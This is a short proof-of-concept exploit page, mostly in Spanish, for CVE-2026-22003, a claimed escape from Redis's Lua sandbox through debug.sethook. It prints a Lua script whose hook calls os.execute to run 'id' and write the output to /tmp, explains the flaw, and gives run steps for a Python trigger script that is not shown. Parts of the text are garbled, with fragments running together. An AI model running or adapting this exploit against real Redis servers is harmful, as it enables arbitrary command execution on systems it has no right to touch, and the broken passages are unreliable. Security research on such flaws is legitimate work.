
Exploit de prueba de concepto para CVE-2026-22003 que demuestra la evasión del sandbox de Lua de Redis mediante debug.sethook para ejecutar comandos arbitrarios del sistema.
debug.sethook-- redis_sandbox.lua - Script that attempts sandbox escape
local function escape()
debug.sethook(function()
-- This hook runs in a privileged context
os.execute("id > /tmp/redis_escape")
end, "r")
local a = 1
end
return escape()
El sandbox de Lua de Redis no deshabilita correctamente la función debug.sethook. Un atacante que pueda ejecutar scripts de Lua puede instalar un hook que se ejecuta en un contexto privilegiado y escapar del sandbox para ejecutar comandos arbitrarios del sistema.
os.execute o funciones similares.EVAL).pip install redis
python trigger_redis_sandbox_escape.py
The file /tmp/redis_escape is created, proving command execution.